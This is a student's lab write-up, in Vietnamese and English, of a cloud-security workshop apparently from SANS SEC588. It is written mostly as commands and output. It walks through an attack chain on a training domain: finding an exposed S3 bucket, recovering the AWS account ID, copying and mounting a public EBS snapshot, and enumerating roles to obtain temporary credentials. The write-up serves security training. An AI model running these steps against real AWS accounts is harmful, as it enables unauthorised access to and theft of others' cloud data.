Chapter 1: Making Mistakes Publicly, Cloud Edition

https://www.aviata.cloud/ACE135-J04-WORKBOOK/chapter01/index.html https://github.com/sans-sec588/sec588-workshop-containers-ace135/tree/main build-directory: build target resource. Thông tin đã biết arn:aws:iam::3[REDACTED]8:role/s3-searcher (arn account attacker) Domain: aviata.cloud # How to get an account from a bucket. Find subdomain ``` subfinder -d aviata.cloud -o /root/workdir/subfinder.txt ``` Ta thu được 2 domain: * dev.aviata.cloud * aviata.cloud 1 trong 2 site này là s3 bucket sử dụng tool sau để check ``` root@588ace135fab:~/bin# s3scanner -bucket-file /root/workdir/subfinder.txt (venv) root@588ace135fab:~/workdir# s3scanner -bucket-file /root/workdir/subfinder.txt INFO not_exist | aviata.cloud INFO exists | dev.aviata.cloud | us-east-2 | AuthUsers: [] | AllUsers: [READ] ``` biết dc web dev.aviata.cloud là s3 bucket https://github.com/WeAreCloudar/s3-account-search This tool lets you find the account id an S3 bucket belongs to. There is an IAM policy condition s3:ResourceAccount, that is meant to be used to give access to S3 in specified (set of) account(s), but also supports wildcards. Tức là s3 sẽ cho phép một số account truy cập vào, ta có thể tìm được id của các account đó. Dùng role của attacker để tiến hành lấy account id: Cần có permission: s3:ListBucket, s3:GetObject ``` root@588ace135fab:~# s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher dev.aviata.cloud Starting search (this can take a while) found: 3 found: 31 found: 97[ found: 97[E found: 97[EX found: 97[EXA found: 97[EXAM found: 97[EXAMP found: 97[EXAMPL found: 97[EXAMPLE found: 97[EXAMPLE] found: 97[EXAMPLE]8 ``` # Snapshots in Accounts EBS snapshot có thể bị public nhầm (đáng lẽ phải private) https://github.com/RhinoSecurityLabs/pacu Pacu is an open-source AWS exploitation framework `ebs__eum_snapshots_unauth` module which will use our keys to search for EBS snapshots that are located within the target organization's account Module này giúp tìm EBS snapshot chứa trong một account. run pacu to list out EBS Snapshots ``` Pacu (workshop:from_default) > run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8 ``` Tìm dc snapshot ``` Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False ``` Copy snapshot về ``` aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2 ``` Save các biến môi trường sau: ``` SnapshotId="snap-0e3c953b5afc8746f" AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }') ``` Giờ load lên để chạy ec2 rồi tìm info trong đó Tạo key ``` aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem chmod 600 /root/workdir/attacker-key.pem ``` create mappings.json file that will allow us to mount the snapshot as a volume. ``` cat << EOF > /root/workdir/mappings.json [ { "DeviceName": "/dev/sdh", "Ebs": { "SnapshotId": "$SnapshotId" } } ] EOF ``` ``` aws ec2 run-instances --image-id $AMI \ --region us-east-2 \ --count 1 \ --instance-type t2.micro \ --key-name attacker-key \ --security-group-ids sg-07[EXAMPLE]e \ --subnet-id subnet-07[EXAMPLE]1 \ --block-device-mappings file:///root/workdir/mappings.json ``` Connect vào ec2 mount the disk and look for any sources of information we can find. (bước này có thể check lại xem disk nào chứa thông tin thì mount) ``` ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP sudo mount /dev/xvdh /mnt cd /mnt ls /mnt/ ``` Tiếp theo sẽ k có gì trong đây :)) # AssumeRole attacks create a word list of potential names that Aviata could use for roles in their environment ``` cat << EOF > /root/workdir/wordlist.txt aviata aviata-cloud EOF ``` In pacu let's run the AssumeRole targeting script, ``` run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8 ``` ``` [iam__enum_roles] { "Credentials": { "AccessKeyId": "ASIA[EXAMPLE]PJ", "SecretAccessKey": "WU3[EXAMPLE]Hlq", "SessionToken": "FwoG[EXAMPLE]A==", "Expiration": "2024-04-13 11:35:10+00:00" }, "AssumedRoleUser": { "AssumedRoleId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk", "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk" } } ``` What did pacu do? It generated an ASIA (Temporary Access Key) into the AWS Environment. Now that have found a role and generated an AWS Account key for it, let's use it. Sau khi có access key thì vào rồi list s3 là ra flag